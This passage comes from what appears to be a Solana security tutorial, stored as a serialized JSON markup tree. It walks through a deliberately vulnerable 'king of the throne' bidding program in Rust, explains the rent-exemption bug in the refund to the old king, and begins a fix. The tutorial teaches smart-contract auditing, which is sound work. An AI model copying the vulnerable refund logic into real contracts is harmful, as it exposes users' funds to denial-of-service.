",{"type":28,"tag":116,"props":71380,"children":71381},{"style":370},[71382],{"type":33,"value":4240},{"type":28,"tag":116,"props":71384,"children":71385},{"style":350},[71386],{"type":33,"value":7606},{"type":28,"tag":116,"props":71388,"children":71389},{"style":266},[71390],{"type":33,"value":895},{"type":28,"tag":116,"props":71392,"children":71393},{"class":245,"line":1137},[71394,71399],{"type":28,"tag":116,"props":71395,"children":71396},{"style":282},[71397],{"type":33,"value":71398},"        transfer_from_signer",{"type":28,"tag":116,"props":71400,"children":71401},{"style":266},[71402],{"type":33,"value":3133},{"type":28,"tag":116,"props":71404,"children":71405},{"class":245,"line":1181},[71406,71410,71414,71418,71422,71426],{"type":28,"tag":116,"props":71407,"children":71408},{"style":370},[71409],{"type":33,"value":7356},{"type":28,"tag":116,"props":71411,"children":71412},{"style":272},[71413],{"type":33,"value":19944},{"type":28,"tag":116,"props":71415,"children":71416},{"style":370},[71417],{"type":33,"value":141},{"type":28,"tag":116,"props":71419,"children":71420},{"style":266},[71421],{"type":33,"value":14341},{"type":28,"tag":116,"props":71423,"children":71424},{"style":370},[71425],{"type":33,"value":141},{"type":28,"tag":116,"props":71427,"children":71428},{"style":266},[71429],{"type":33,"value":71430},"payer,\n",{"type":28,"tag":116,"props":71432,"children":71433},{"class":245,"line":1212},[71434,71438,71442,71446,71450,71454,71458,71462,71467],{"type":28,"tag":116,"props":71435,"children":71436},{"style":370},[71437],{"type":33,"value":7356},{"type":28,"tag":116,"props":71439,"children":71440},{"style":272},[71441],{"type":33,"value":19944},{"type":28,"tag":116,"props":71443,"children":71444},{"style":370},[71445],{"type":33,"value":141},{"type":28,"tag":116,"props":71447,"children":71448},{"style":266},[71449],{"type":33,"value":14341},{"type":28,"tag":116,"props":71451,"children":71452},{"style":370},[71453],{"type":33,"value":141},{"type":28,"tag":116,"props":71455,"children":71456},{"style":266},[71457],{"type":33,"value":71369},{"type":28,"tag":116,"props":71459,"children":71460},{"style":370},[71461],{"type":33,"value":141},{"type":28,"tag":116,"props":71463,"children":71464},{"style":282},[71465],{"type":33,"value":71466},"to_account_info",{"type":28,"tag":116,"props":71468,"children":71469},{"style":266},[71470],{"type":33,"value":3161},{"type":28,"tag":116,"props":71472,"children":71473},{"class":245,"line":1254},[71474,71479],{"type":28,"tag":116,"props":71475,"children":71476},{"style":272},[71477],{"type":33,"value":71478},"            bid_amount",{"type":28,"tag":116,"props":71480,"children":71481},{"style":266},[71482],{"type":33,"value":3178},{"type":28,"tag":116,"props":71484,"children":71485},{"class":245,"line":1262},[71486,71491,71495],{"type":28,"tag":116,"props":71487,"children":71488},{"style":266},[71489],{"type":33,"value":71490},"        )",{"type":28,"tag":116,"props":71492,"children":71493},{"style":370},[71494],{"type":33,"value":2825},{"type":28,"tag":116,"props":71496,"children":71497},{"style":266},[71498],{"type":33,"value":384},{"type":28,"tag":116,"props":71500,"children":71501},{"class":245,"line":1294},[71502],{"type":28,"tag":116,"props":71503,"children":71504},{"emptyLinePlaceholder":19},[71505],{"type":33,"value":1044},{"type":28,"tag":116,"props":71507,"children":71508},{"class":245,"line":1334},[71509],{"type":28,"tag":116,"props":71510,"children":71511},{"style":250},[71512],{"type":33,"value":71513},"        // Reimburse 95% of the last bid to the old king\n",{"type":28,"tag":116,"props":71515,"children":71516},{"class":245,"line":1372},[71517,71521,71526,71530,71534,71538,71542,71546,71550,71554,71558,71562,71566,71571,71575,71579,71584],{"type":28,"tag":116,"props":71518,"children":71519},{"style":376},[71520],{"type":33,"value":2736},{"type":28,"tag":116,"props":71522,"children":71523},{"style":272},[71524],{"type":33,"value":71525}," to_reimburse",{"type":28,"tag":116,"props":71527,"children":71528},{"style":370},[71529],{"type":33,"value":2226},{"type":28,"tag":116,"props":71531,"children":71532},{"style":266},[71533],{"type":33,"value":269},{"type":28,"tag":116,"props":71535,"children":71536},{"style":272},[71537],{"type":33,"value":19944},{"type":28,"tag":116,"props":71539,"children":71540},{"style":370},[71541],{"type":33,"value":141},{"type":28,"tag":116,"props":71543,"children":71544},{"style":266},[71545],{"type":33,"value":14341},{"type":28,"tag":116,"props":71547,"children":71548},{"style":370},[71549],{"type":33,"value":141},{"type":28,"tag":116,"props":71551,"children":71552},{"style":266},[71553],{"type":33,"value":71369},{"type":28,"tag":116,"props":71555,"children":71556},{"style":370},[71557],{"type":33,"value":141},{"type":28,"tag":116,"props":71559,"children":71560},{"style":266},[71561],{"type":33,"value":71378},{"type":28,"tag":116,"props":71563,"children":71564},{"style":370},[71565],{"type":33,"value":4240},{"type":28,"tag":116,"props":71567,"children":71568},{"style":350},[71569],{"type":33,"value":71570}," 9500",{"type":28,"tag":116,"props":71572,"children":71573},{"style":266},[71574],{"type":33,"value":1609},{"type":28,"tag":116,"props":71576,"children":71577},{"style":370},[71578],{"type":33,"value":4250},{"type":28,"tag":116,"props":71580,"children":71581},{"style":350},[71582],{"type":33,"value":71583}," 10000",{"type":28,"tag":116,"props":71585,"children":71586},{"style":266},[71587],{"type":33,"value":384},{"type":28,"tag":116,"props":71589,"children":71590},{"class":245,"line":1381},[71591,71596],{"type":28,"tag":116,"props":71592,"children":71593},{"style":282},[71594],{"type":33,"value":71595},"        transfer_from_pda",{"type":28,"tag":116,"props":71597,"children":71598},{"style":266},[71599],{"type":33,"value":3133},{"type":28,"tag":116,"props":71601,"children":71602},{"class":245,"line":1389},[71603,71607,71611,71615,71619,71623,71627,71631,71635],{"type":28,"tag":116,"props":71604,"children":71605},{"style":370},[71606],{"type":33,"value":7356},{"type":28,"tag":116,"props":71608,"children":71609},{"style":272},[71610],{"type":33,"value":19944},{"type":28,"tag":116,"props":71612,"children":71613},{"style":370},[71614],{"type":33,"value":141},{"type":28,"tag":116,"props":71616,"children":71617},{"style":266},[71618],{"type":33,"value":14341},{"type":28,"tag":116,"props":71620,"children":71621},{"style":370},[71622],{"type":33,"value":141},{"type":28,"tag":116,"props":71624,"children":71625},{"style":266},[71626],{"type":33,"value":71369},{"type":28,"tag":116,"props":71628,"children":71629},{"style":370},[71630],{"type":33,"value":141},{"type":28,"tag":116,"props":71632,"children":71633},{"style":282},[71634],{"type":33,"value":71466},{"type":28,"tag":116,"props":71636,"children":71637},{"style":266},[71638],{"type":33,"value":3161},{"type":28,"tag":116,"props":71640,"children":71641},{"class":245,"line":1425},[71642,71646,71650,71654,71658,71662],{"type":28,"tag":116,"props":71643,"children":71644},{"style":370},[71645],{"type":33,"value":7356},{"type":28,"tag":116,"props":71647,"children":71648},{"style":272},[71649],{"type":33,"value":19944},{"type":28,"tag":116,"props":71651,"children":71652},{"style":370},[71653],{"type":33,"value":141},{"type":28,"tag":116,"props":71655,"children":71656},{"style":266},[71657],{"type":33,"value":14341},{"type":28,"tag":116,"props":71659,"children":71660},{"style":370},[71661],{"type":33,"value":141},{"type":28,"tag":116,"props":71663,"children":71664},{"style":266},[71665],{"type":33,"value":71666},"old_king,\n",{"type":28,"tag":116,"props":71668,"children":71669},{"class":245,"line":1448},[71670,71675],{"type":28,"tag":116,"props":71671,"children":71672},{"style":272},[71673],{"type":33,"value":71674},"            to_reimburse",{"type":28,"tag":116,"props":71676,"children":71677},{"style":266},[71678],{"type":33,"value":3178},{"type":28,"tag":116,"props":71680,"children":71681},{"class":245,"line":1456},[71682,71686,71690],{"type":28,"tag":116,"props":71683,"children":71684},{"style":266},[71685],{"type":33,"value":71490},{"type":28,"tag":116,"props":71687,"children":71688},{"style":370},[71689],{"type":33,"value":2825},{"type":28,"tag":116,"props":71691,"children":71692},{"style":266},[71693],{"type":33,"value":384},{"type":28,"tag":116,"props":71695,"children":71696},{"class":245,"line":1520},[71697],{"type":28,"tag":116,"props":71698,"children":71699},{"emptyLinePlaceholder":19},[71700],{"type":33,"value":1044},{"type":28,"tag":116,"props":71702,"children":71703},{"class":245,"line":1580},[71704],{"type":28,"tag":116,"props":71705,"children":71706},{"style":250},[71707],{"type":33,"value":71708},"        // Set new king\n",{"type":28,"tag":116,"props":71710,"children":71711},{"class":245,"line":1620},[71712,71716,71720,71724,71728,71732,71736,71741,71745,71749,71753,71757,71761,71766,71770,71775],{"type":28,"tag":116,"props":71713,"children":71714},{"style":272},[71715],{"type":33,"value":25841},{"type":28,"tag":116,"props":71717,"children":71718},{"style":370},[71719],{"type":33,"value":141},{"type":28,"tag":116,"props":71721,"children":71722},{"style":266},[71723],{"type":33,"value":14341},{"type":28,"tag":116,"props":71725,"children":71726},{"style":370},[71727],{"type":33,"value":141},{"type":28,"tag":116,"props":71729,"children":71730},{"style":266},[71731],{"type":33,"value":71369},{"type":28,"tag":116,"props":71733,"children":71734},{"style":370},[71735],{"type":33,"value":141},{"type":28,"tag":116,"props":71737,"children":71738},{"style":266},[71739],{"type":33,"value":71740},"king ",{"type":28,"tag":116,"props":71742,"children":71743},{"style":370},[71744],{"type":33,"value":373},{"type":28,"tag":116,"props":71746,"children":71747},{"style":272},[71748],{"type":33,"value":25498},{"type":28,"tag":116,"props":71750,"children":71751},{"style":370},[71752],{"type":33,"value":141},{"type":28,"tag":116,"props":71754,"children":71755},{"style":266},[71756],{"type":33,"value":14341},{"type":28,"tag":116,"props":71758,"children":71759},{"style":370},[71760],{"type":33,"value":141},{"type":28,"tag":116,"props":71762,"children":71763},{"style":266},[71764],{"type":33,"value":71765},"new_king",{"type":28,"tag":116,"props":71767,"children":71768},{"style":370},[71769],{"type":33,"value":141},{"type":28,"tag":116,"props":71771,"children":71772},{"style":282},[71773],{"type":33,"value":71774},"key",{"type":28,"tag":116,"props":71776,"children":71777},{"style":266},[71778],{"type":33,"value":1445},{"type":28,"tag":116,"props":71780,"children":71781},{"class":245,"line":1668},[71782,71786,71790,71794,71798,71802,71806,71810,71814,71819],{"type":28,"tag":116,"props":71783,"children":71784},{"style":272},[71785],{"type":33,"value":25841},{"type":28,"tag":116,"props":71787,"children":71788},{"style":370},[71789],{"type":33,"value":141},{"type":28,"tag":116,"props":71791,"children":71792},{"style":266},[71793],{"type":33,"value":14341},{"type":28,"tag":116,"props":71795,"children":71796},{"style":370},[71797],{"type":33,"value":141},{"type":28,"tag":116,"props":71799,"children":71800},{"style":266},[71801],{"type":33,"value":71369},{"type":28,"tag":116,"props":71803,"children":71804},{"style":370},[71805],{"type":33,"value":141},{"type":28,"tag":116,"props":71807,"children":71808},{"style":266},[71809],{"type":33,"value":71378},{"type":28,"tag":116,"props":71811,"children":71812},{"style":370},[71813],{"type":33,"value":373},{"type":28,"tag":116,"props":71815,"children":71816},{"style":272},[71817],{"type":33,"value":71818}," bid_amount",{"type":28,"tag":116,"props":71820,"children":71821},{"style":266},[71822],{"type":33,"value":384},{"type":28,"tag":116,"props":71824,"children":71825},{"class":245,"line":1677},[71826,71830,71834,71838,71842,71846,71850,71855,71859,71864,71868,71872,71876,71880,71885,71889,71893],{"type":28,"tag":116,"props":71827,"children":71828},{"style":272},[71829],{"type":33,"value":25841},{"type":28,"tag":116,"props":71831,"children":71832},{"style":370},[71833],{"type":33,"value":141},{"type":28,"tag":116,"props":71835,"children":71836},{"style":266},[71837],{"type":33,"value":14341},{"type":28,"tag":116,"props":71839,"children":71840},{"style":370},[71841],{"type":33,"value":141},{"type":28,"tag":116,"props":71843,"children":71844},{"style":266},[71845],{"type":33,"value":71369},{"type":28,"tag":116,"props":71847,"children":71848},{"style":370},[71849],{"type":33,"value":141},{"type":28,"tag":116,"props":71851,"children":71852},{"style":266},[71853],{"type":33,"value":71854},"last_time ",{"type":28,"tag":116,"props":71856,"children":71857},{"style":370},[71858],{"type":33,"value":373},{"type":28,"tag":116,"props":71860,"children":71861},{"style":339},[71862],{"type":33,"value":71863}," Clock",{"type":28,"tag":116,"props":71865,"children":71866},{"style":370},[71867],{"type":33,"value":3151},{"type":28,"tag":116,"props":71869,"children":71870},{"style":282},[71871],{"type":33,"value":16013},{"type":28,"tag":116,"props":71873,"children":71874},{"style":266},[71875],{"type":33,"value":13545},{"type":28,"tag":116,"props":71877,"children":71878},{"style":370},[71879],{"type":33,"value":2803},{"type":28,"tag":116,"props":71881,"children":71882},{"style":266},[71883],{"type":33,"value":71884},"unix_timestamp ",{"type":28,"tag":116,"props":71886,"children":71887},{"style":376},[71888],{"type":33,"value":8513},{"type":28,"tag":116,"props":71890,"children":71891},{"style":339},[71892],{"type":33,"value":5531},{"type":28,"tag":116,"props":71894,"children":71895},{"style":266},[71896],{"type":33,"value":384},{"type":28,"tag":116,"props":71898,"children":71899},{"class":245,"line":1685},[71900],{"type":28,"tag":116,"props":71901,"children":71902},{"emptyLinePlaceholder":19},[71903],{"type":33,"value":1044},{"type":28,"tag":116,"props":71905,"children":71906},{"class":245,"line":1729},[71907,71911],{"type":28,"tag":116,"props":71908,"children":71909},{"style":339},[71910],{"type":33,"value":14477},{"type":28,"tag":116,"props":71912,"children":71913},{"style":266},[71914],{"type":33,"value":14004},{"type":28,"tag":116,"props":71916,"children":71917},{"class":245,"line":1764},[71918],{"type":28,"tag":116,"props":71919,"children":71920},{"style":266},[71921],{"type":33,"value":3025},{"type":28,"tag":116,"props":71923,"children":71924},{"class":245,"line":1896},[71925],{"type":28,"tag":116,"props":71926,"children":71927},{"style":266},[71928],{"type":33,"value":406},{"type":28,"tag":29,"props":71930,"children":71931},{},[71932],{"type":33,"value":71933},"Note this comment:",{"type":28,"tag":107,"props":71935,"children":71936},{},[71937],{"type":28,"tag":29,"props":71938,"children":71939},{},[71940],{"type":33,"value":71941},"any writable account is allowed as a new king.",{"type":28,"tag":29,"props":71943,"children":71944},{},[71945],{"type":33,"value":71946},"...Is our assumption correct?",{"type":28,"tag":63,"props":71948,"children":71950},{"id":71949},"the-bugs-lurking-beneath",[71951],{"type":33,"value":71952},"The Bugs Lurking Beneath",{"type":28,"tag":75,"props":71954,"children":71956},{"id":71955},"bug-1-the-rent-exemption-trap",[71957],{"type":33,"value":71958},"Bug 1: The Rent-Exemption Trap",{"type":28,"tag":29,"props":71960,"children":71961},{},[71962,71964,71969],{"type":33,"value":71963},"On Solana, all accounts must maintain a ",{"type":28,"tag":4995,"props":71965,"children":71966},{},[71967],{"type":33,"value":71968},"minimum balance",{"type":33,"value":71970}," of lamports to remain rent-exempt. Specifically, an account can be in one of two states:",{"type":28,"tag":2108,"props":71972,"children":71973},{},[71974,71989],{"type":28,"tag":459,"props":71975,"children":71976},{},[71977,71982,71983],{"type":28,"tag":4995,"props":71978,"children":71979},{},[71980],{"type":33,"value":71981},"Uninitialized",{"type":33,"value":14994},{"type":28,"tag":98,"props":71984,"children":71986},{"className":71985},[],[71987],{"type":33,"value":71988},"lamports = 0",{"type":28,"tag":459,"props":71990,"children":71991},{},[71992,71997,71998],{"type":28,"tag":4995,"props":71993,"children":71994},{},[71995],{"type":33,"value":71996},"Initialized",{"type":33,"value":14994},{"type":28,"tag":98,"props":71999,"children":72001},{"className":72000},[],[72002],{"type":33,"value":72003},"lamports >= rent-exempt threshold",{"type":28,"tag":29,"props":72005,"children":72006},{},[72007,72009,72014],{"type":33,"value":72008},"This rent model exists to prevent low-cost DoS attacks on validators. The key idea is that even an account with no data (i.e., zero-length data buffer) still consumes on-chain resources; specifically, ",{"type":28,"tag":4995,"props":72010,"children":72011},{},[72012],{"type":33,"value":72013},"account metadata",{"type":33,"value":72015}," like its public key, owner, or lamport balance. That metadata must be stored persistently by validators, and that storage isn't free.",{"type":28,"tag":29,"props":72017,"children":72018},{},[72019,72021,72027],{"type":33,"value":72020},"So “persistent state” on Solana doesn’t just mean your program's data — it includes the base account structure itself. Even accounts with ",{"type":28,"tag":98,"props":72022,"children":72024},{"className":72023},[],[72025],{"type":33,"value":72026},"data.len() == 0",{"type":33,"value":72028}," must meet a minimum rent threshold to remain alive and avoid garbage collection by the runtime.",{"type":28,"tag":29,"props":72030,"children":72031},{},[72032,72034,72040],{"type":33,"value":72033},"This is enforced at the runtime level, and the relevant logic can be found ",{"type":28,"tag":87,"props":72035,"children":72038},{"href":72036,"rel":72037},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/svm-rent-collector/src/svm_rent_collector.rs#L117-L136",[91],[72039],{"type":33,"value":2039},{"type":33,"value":141},{"type":28,"tag":234,"props":72042,"children":72044},{"className":2652,"code":72043,"language":2651,"meta":7,"style":7},"    fn transition_allowed(&self, pre_rent_state: &RentState, post_rent_state: &RentState) -> bool {\n        match post_rent_state {\n            RentState::Uninitialized | RentState::RentExempt => true,\n            RentState::RentPaying {\n                data_size: post_data_size,\n                lamports: post_lamports,\n            } => {\n                match pre_rent_state {\n                    RentState::Uninitialized | RentState::RentExempt => false,\n                    RentState::RentPaying {\n                        data_size: pre_data_size,\n                        lamports: pre_lamports,\n                    } => {\n                        // Cannot remain RentPaying if resized or credited.\n                        post_data_size == pre_data_size && post_lamports \u003C= pre_lamports\n                    }\n                }\n            }\n        }\n    }\n",[72045],{"type":28,"tag":98,"props":72046,"children":72047},{"__ignoreMap":7},[72048,72132,72149,72195,72215,72236,72257,72272,72289,72333,72352,72373,72394,72410,72418,72451,72458,72465,72472,72479],{"type":28,"tag":116,"props":72049,"children":72050},{"class":245,"line":246},[72051,72056,72061,72065,72069,72073,72077,72082,72086,72090,72095,72099,72104,72108,72112,72116,72120,72124,72128],{"type":28,"tag":116,"props":72052,"children":72053},{"style":376},[72054],{"type":33,"value":72055},"    fn",{"type":28,"tag":116,"props":72057,"children":72058},{"style":282},[72059],{"type":33,"value":72060}," transition_allowed",{"type":28,"tag":116,"props":72062,"children":72063},{"style":266},[72064],{"type":33,"value":313},{"type":28,"tag":116,"props":72066,"children":72067},{"style":370},[72068],{"type":33,"value":2780},{"type":28,"tag":116,"props":72070,"children":72071},{"style":376},[72072],{"type":33,"value":13379},{"type":28,"tag":116,"props":72074,"children":72075},{"style":266},[72076],{"type":33,"value":825},{"type":28,"tag":116,"props":72078,"children":72079},{"style":272},[72080],{"type":33,"value":72081},"pre_rent_state",{"type":28,"tag":116,"props":72083,"children":72084},{"style":370},[72085],{"type":33,"value":4160},{"type":28,"tag":116,"props":72087,"children":72088},{"style":370},[72089],{"type":33,"value":6813},{"type":28,"tag":116,"props":72091,"children":72092},{"style":339},[72093],{"type":33,"value":72094},"RentState",{"type":28,"tag":116,"props":72096,"children":72097},{"style":266},[72098],{"type":33,"value":825},{"type":28,"tag":116,"props":72100,"children":72101},{"style":272},[72102],{"type":33,"value":72103},"post_rent_state",{"type":28,"tag":116,"props":72105,"children":72106},{"style":370},[72107],{"type":33,"value":4160},{"type":28,"tag":116,"props":72109,"children":72110},{"style":370},[72111],{"type":33,"value":6813},{"type":28,"tag":116,"props":72113,"children":72114},{"style":339},[72115],{"type":33,"value":72094},{"type":28,"tag":116,"props":72117,"children":72118},{"style":266},[72119],{"type":33,"value":1609},{"type":28,"tag":116,"props":72121,"children":72122},{"style":370},[72123],{"type":33,"value":13423},{"type":28,"tag":116,"props":72125,"children":72126},{"style":339},[72127],{"type":33,"value":11718},{"type":28,"tag":116,"props":72129,"children":72130},{"style":266},[72131],{"type":33,"value":1291},{"type":28,"tag":116,"props":72133,"children":72134},{"class":245,"line":256},[72135,72140,72145],{"type":28,"tag":116,"props":72136,"children":72137},{"style":260},[72138],{"type":33,"value":72139},"        match",{"type":28,"tag":116,"props":72141,"children":72142},{"style":272},[72143],{"type":33,"value":72144}," post_rent_state",{"type":28,"tag":116,"props":72146,"children":72147},{"style":266},[72148],{"type":33,"value":1291},{"type":28,"tag":116,"props":72150,"children":72151},{"class":245,"line":293},[72152,72157,72161,72165,72169,72174,72178,72183,72187,72191],{"type":28,"tag":116,"props":72153,"children":72154},{"style":339},[72155],{"type":33,"value":72156},"            RentState",{"type":28,"tag":116,"props":72158,"children":72159},{"style":370},[72160],{"type":33,"value":3151},{"type":28,"tag":116,"props":72162,"children":72163},{"style":339},[72164],{"type":33,"value":71981},{"type":28,"tag":116,"props":72166,"children":72167},{"style":370},[72168],{"type":33,"value":3938},{"type":28,"tag":116,"props":72170,"children":72171},{"style":339},[72172],{"type":33,"value":72173}," RentState",{"type":28,"tag":116,"props":72175,"children":72176},{"style":370},[72177],{"type":33,"value":3151},{"type":28,"tag":116,"props":72179,"children":72180},{"style":339},[72181],{"type":33,"value":72182},"RentExempt",{"type":28,"tag":116,"props":72184,"children":72185},{"style":370},[72186],{"type":33,"value":1418},{"type":28,"tag":116,"props":72188,"children":72189},{"style":376},[72190],{"type":33,"value":1129},{"type":28,"tag":116,"props":72192,"children":72193},{"style":266},[72194],{"type":33,"value":3178},{"type":28,"tag":116,"props":72196,"children":72197},{"class":245,"line":361},[72198,72202,72206,72211],{"type":28,"tag":116,"props":72199,"children":72200},{"style":339},[72201],{"type":33,"value":72156},{"type":28,"tag":116,"props":72203,"children":72204},{"style":370},[72205],{"type":33,"value":3151},{"type":28,"tag":116,"props":72207,"children":72208},{"style":339},[72209],{"type":33,"value":72210},"RentPaying",{"type":28,"tag":116,"props":72212,"children":72213},{"style":266},[72214],{"type":33,"value":1291},{"type":28,"tag":116,"props":72216,"children":72217},{"class":245,"line":387},[72218,72223,72227,72232],{"type":28,"tag":116,"props":72219,"children":72220},{"style":272},[72221],{"type":33,"value":72222},"                data_size",{"type":28,"tag":116,"props":72224,"children":72225},{"style":370},[72226],{"type":33,"value":4160},{"type":28,"tag":116,"props":72228,"children":72229},{"style":272},[72230],{"type":33,"value":72231}," post_data_size",{"type":28,"tag":116,"props":72233,"children":72234},{"style":266},[72235],{"type":33,"value":3178},{"type":28,"tag":116,"props":72237,"children":72238},{"class":245,"line":400},[72239,72244,72248,72253],{"type":28,"tag":116,"props":72240,"children":72241},{"style":272},[72242],{"type":33,"value":72243},"                lamports",{"type":28,"tag":116,"props":72245,"children":72246},{"style":370},[72247],{"type":33,"value":4160},{"type":28,"tag":116,"props":72249,"children":72250},{"style":272},[72251],{"type":33,"value":72252}," post_lamports",{"type":28,"tag":116,"props":72254,"children":72255},{"style":266},[72256],{"type":33,"value":3178},{"type":28,"tag":116,"props":72258,"children":72259},{"class":245,"line":614},[72260,72264,72268],{"type":28,"tag":116,"props":72261,"children":72262},{"style":266},[72263],{"type":33,"value":70213},{"type":28,"tag":116,"props":72265,"children":72266},{"style":370},[72267],{"type":33,"value":1286},{"type":28,"tag":116,"props":72269,"children":72270},{"style":266},[72271],{"type":33,"value":1291},{"type":28,"tag":116,"props":72273,"children":72274},{"class":245,"line":631},[72275,72280,72285],{"type":28,"tag":116,"props":72276,"children":72277},{"style":260},[72278],{"type":33,"value":72279},"                match",{"type":28,"tag":116,"props":72281,"children":72282},{"style":272},[72283],{"type":33,"value":72284}," pre_rent_state",{"type":28,"tag":116,"props":72286,"children":72287},{"style":266},[72288],{"type":33,"value":1291},{"type":28,"tag":116,"props":72290,"children":72291},{"class":245,"line":665},[72292,72297,72301,72305,72309,72313,72317,72321,72325,72329],{"type":28,"tag":116,"props":72293,"children":72294},{"style":339},[72295],{"type":33,"value":72296},"                    RentState",{"type":28,"tag":116,"props":72298,"children":72299},{"style":370},[72300],{"type":33,"value":3151},{"type":28,"tag":116,"props":72302,"children":72303},{"style":339},[72304],{"type":33,"value":71981},{"type":28,"tag":116,"props":72306,"children":72307},{"style":370},[72308],{"type":33,"value":3938},{"type":28,"tag":116,"props":72310,"children":72311},{"style":339},[72312],{"type":33,"value":72173},{"type":28,"tag":116,"props":72314,"children":72315},{"style":370},[72316],{"type":33,"value":3151},{"type":28,"tag":116,"props":72318,"children":72319},{"style":339},[72320],{"type":33,"value":72182},{"type":28,"tag":116,"props":72322,"children":72323},{"style":370},[72324],{"type":33,"value":1418},{"type":28,"tag":116,"props":72326,"children":72327},{"style":376},[72328],{"type":33,"value":1022},{"type":28,"tag":116,"props":72330,"children":72331},{"style":266},[72332],{"type":33,"value":3178},{"type":28,"tag":116,"props":72334,"children":72335},{"class":245,"line":713},[72336,72340,72344,72348],{"type":28,"tag":116,"props":72337,"children":72338},{"style":339},[72339],{"type":33,"value":72296},{"type":28,"tag":116,"props":72341,"children":72342},{"style":370},[72343],{"type":33,"value":3151},{"type":28,"tag":116,"props":72345,"children":72346},{"style":339},[72347],{"type":33,"value":72210},{"type":28,"tag":116,"props":72349,"children":72350},{"style":266},[72351],{"type":33,"value":1291},{"type":28,"tag":116,"props":72353,"children":72354},{"class":245,"line":750},[72355,72360,72364,72369],{"type":28,"tag":116,"props":72356,"children":72357},{"style":272},[72358],{"type":33,"value":72359},"                        data_size",{"type":28,"tag":116,"props":72361,"children":72362},{"style":370},[72363],{"type":33,"value":4160},{"type":28,"tag":116,"props":72365,"children":72366},{"style":272},[72367],{"type":33,"value":72368}," pre_data_size",{"type":28,"tag":116,"props":72370,"children":72371},{"style":266},[72372],{"type":33,"value":3178},{"type":28,"tag":116,"props":72374,"children":72375},{"class":245,"line":779},[72376,72381,72385,72390],{"type":28,"tag":116,"props":72377,"children":72378},{"style":272},[72379],{"type":33,"value":72380},"                        lamports",{"type":28,"tag":116,"props":72382,"children":72383},{"style":370},[72384],{"type":33,"value":4160},{"type":28,"tag":116,"props":72386,"children":72387},{"style":272},[72388],{"type":33,"value":72389}," pre_lamports",{"type":28,"tag":116,"props":72391,"children":72392},{"style":266},[72393],{"type":33,"value":3178},{"type":28,"tag":116,"props":72395,"children":72396},{"class":245,"line":796},[72397,72402,72406],{"type":28,"tag":116,"props":72398,"children":72399},{"style":266},[72400],{"type":33,"value":72401},"                    } ",{"type":28,"tag":116,"props":72403,"children":72404},{"style":370},[72405],{"type":33,"value":1286},{"type":28,"tag":116,"props":72407,"children":72408},{"style":266},[72409],{"type":33,"value":1291},{"type":28,"tag":116,"props":72411,"children":72412},{"class":245,"line":847},[72413],{"type":28,"tag":116,"props":72414,"children":72415},{"style":250},[72416],{"type":33,"value":72417},"                        // Cannot remain RentPaying if resized or credited.\n",{"type":28,"tag":116,"props":72419,"children":72420},{"class":245,"line":898},[72421,72426,72430,72434,72438,72442,72446],{"type":28,"tag":116,"props":72422,"children":72423},{"style":272},[72424],{"type":33,"value":72425},"                        post_data_size",{"type":28,"tag":116,"props":72427,"children":72428},{"style":370},[72429],{"type":33,"value":2953},{"type":28,"tag":116,"props":72431,"children":72432},{"style":272},[72433],{"type":33,"value":72368},{"type":28,"tag":116,"props":72435,"children":72436},{"style":370},[72437],{"type":33,"value":13851},{"type":28,"tag":116,"props":72439,"children":72440},{"style":272},[72441],{"type":33,"value":72252},{"type":28,"tag":116,"props":72443,"children":72444},{"style":370},[72445],{"type":33,"value":7869},{"type":28,"tag":116,"props":72447,"children":72448},{"style":272},[72449],{"type":33,"value":72450}," pre_lamports\n",{"type":28,"tag":116,"props":72452,"children":72453},{"class":245,"line":907},[72454],{"type":28,"tag":116,"props":72455,"children":72456},{"style":266},[72457],{"type":33,"value":70681},{"type":28,"tag":116,"props":72459,"children":72460},{"class":245,"line":981},[72461],{"type":28,"tag":116,"props":72462,"children":72463},{"style":266},[72464],{"type":33,"value":70689},{"type":28,"tag":116,"props":72466,"children":72467},{"class":245,"line":1011},[72468],{"type":28,"tag":116,"props":72469,"children":72470},{"style":266},[72471],{"type":33,"value":58503},{"type":28,"tag":116,"props":72473,"children":72474},{"class":245,"line":1029},[72475],{"type":28,"tag":116,"props":72476,"children":72477},{"style":266},[72478],{"type":33,"value":1954},{"type":28,"tag":116,"props":72480,"children":72481},{"class":245,"line":1038},[72482],{"type":28,"tag":116,"props":72483,"children":72484},{"style":266},[72485],{"type":33,"value":3025},{"type":28,"tag":29,"props":72487,"children":72488},{},[72489],{"type":33,"value":72490},"You can check the rent-exemption threshold for a zero-data account with the CLI:",{"type":28,"tag":234,"props":72492,"children":72494},{"className":3912,"code":72493,"language":3911,"meta":7,"style":7},"solana rent 0\nRent-exempt minimum: 0.00089088 SOL\n",[72495],{"type":28,"tag":98,"props":72496,"children":72497},{"__ignoreMap":7},[72498,72514],{"type":28,"tag":116,"props":72499,"children":72500},{"class":245,"line":246},[72501,72505,72510],{"type":28,"tag":116,"props":72502,"children":72503},{"style":282},[72504],{"type":33,"value":2551},{"type":28,"tag":116,"props":72506,"children":72507},{"style":563},[72508],{"type":33,"value":72509}," rent",{"type":28,"tag":116,"props":72511,"children":72512},{"style":350},[72513],{"type":33,"value":23933},{"type":28,"tag":116,"props":72515,"children":72516},{"class":245,"line":256},[72517,72522,72527,72532],{"type":28,"tag":116,"props":72518,"children":72519},{"style":282},[72520],{"type":33,"value":72521},"Rent-exempt",{"type":28,"tag":116,"props":72523,"children":72524},{"style":563},[72525],{"type":33,"value":72526}," minimum:",{"type":28,"tag":116,"props":72528,"children":72529},{"style":350},[72530],{"type":33,"value":72531}," 0.00089088",{"type":28,"tag":116,"props":72533,"children":72534},{"style":563},[72535],{"type":33,"value":72536}," SOL\n",{"type":28,"tag":443,"props":72538,"children":72540},{"id":72539},"fix-1-only-reimburse-if-rent-exempt",[72541],{"type":33,"value":72542},"Fix 1: Only Reimburse if Rent-Exempt",{"type":28,"tag":29,"props":72544,"children":72545},{},[72546],{"type":33,"value":72547},"We don't want to donate anything to an unfair king! So let's update our program to reimburse only if the old king will be rent-exempt after the transfer:",{"type":28,"tag":234,"props":72549,"children":72551},{"className":39980,"code":72550,"language":39982,"meta":7,"style":7},"let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n+let rent = Rent::get()?;\n+let balance_after = ctx.accounts.old_king.lamports() + to_reimburse;\n+if rent.is_exempt(balance_after, ctx.accounts.old_king.data_len()) {\n    transfer_from_pda(\n        &ctx.accounts.throne.to_account_info(),\n        &ctx.accounts.old_king,\n        to_reimburse,\n    